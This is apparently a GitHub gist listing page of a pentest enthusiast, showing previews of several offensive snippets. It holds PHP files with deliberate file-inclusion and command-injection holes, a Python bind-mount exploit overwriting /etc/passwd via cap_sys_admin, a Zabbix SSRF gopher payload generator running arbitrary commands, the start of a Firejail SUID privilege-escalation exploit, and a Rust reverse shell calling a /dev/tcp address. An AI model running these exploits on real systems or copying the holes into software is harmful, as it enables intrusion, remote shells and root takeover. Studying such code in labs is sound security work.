Gustavo Saez Ferreira GugSaas

🎯

Focusing

Aficionado em Segurança da Informação e Programação. Além de Pentest Black Box Web/Infra, irei me especializar em pentest de dispositivos Wi-Fi e Mobile

97 followers · 102 following

Brazil
https://www.linkedin.com/in/gustavo-saas/

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

GugSaas / index.php

Last active December 27, 2022 19:01

Code to understand LFI

	<?php

	if(isset($_GET['page']) and !empty($_GET['page'])) {
	echo file_get_contents("paginas/".$_GET['page']);
	} else {
	echo file_get_contents("paginas/home.html");
	}

	?>

GugSaas / home.html

Last active December 27, 2022 19:09

Code HTML to exemplify a home page of a Company

	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Home</title>
	</head>
	<body>
	<h1>Essa é a página principal da Empresa Saas</h1>

GugSaas / exploit.py

Created December 30, 2022 15:33

Exploit python capabilities "cap_sys_admin+ep"

	from ctypes import *
	libc = CDLL("libc.so.6")
	libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
	MS_BIND = 4096
	source = b"/tmp/passwd"
	target = b"/etc/passwd"
	filesystemtype = b"none"
	options = b"rw"
	mountflags = MS_BIND
	libc.mount(source, target, filesystemtype, mountflags, options)

GugSaas / index.php

Created January 22, 2023 19:13

Basic SSRF flaw

	<?php

	if($_GET['next']){
	system("curl ".$_GET['next']);
	}

	?>
	<a href="?next=https://google.com">Clique aqui caso nao tenha sido redirecionado</a>

GugSaas / ssrf_zabbix.py

Created January 22, 2023 19:55

Payload to exploit SSRF Protocol Smuggling to interact with Zabbix intead of Gopherus (out of date payload)

	import struct
	import urllib.parse


	header = "ZBXD\x01"
	key0 = input('Command: ')
	key = f'system.run[({key0})]'
	print("gopher://127.0.0.1:10050/_",end="")
	print(urllib.parse.quote_plus(header).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":"),end="")
	print(urllib.parse.quote_plus(struct.pack("<Q", len(key)+2).decode()).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":"),end="")

GugSaas / exploit.py

Created March 24, 2023 00:06

Firejail suid bit priv esc - Exploit

	#!/usr/bin/python3

	import os
	import shutil
	import stat
	import subprocess
	import sys
	import tempfile
	import time
	from pathlib import Path

GugSaas / reverse.rs

Created June 20, 2023 01:40

Reverse Shell in Rust

	// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;)
	extern crate chrono;

	use std::fs::OpenOptions;
	use std::io::Write;
	use chrono::prelude::*;
	use std::process::Command;

	pub fn log(user: &str, query: &str, justification: &str) {
	let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1";

GugSaas / poc.pdf

Created June 23, 2023 15:07

XSS in PDF File - By Victorjj

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.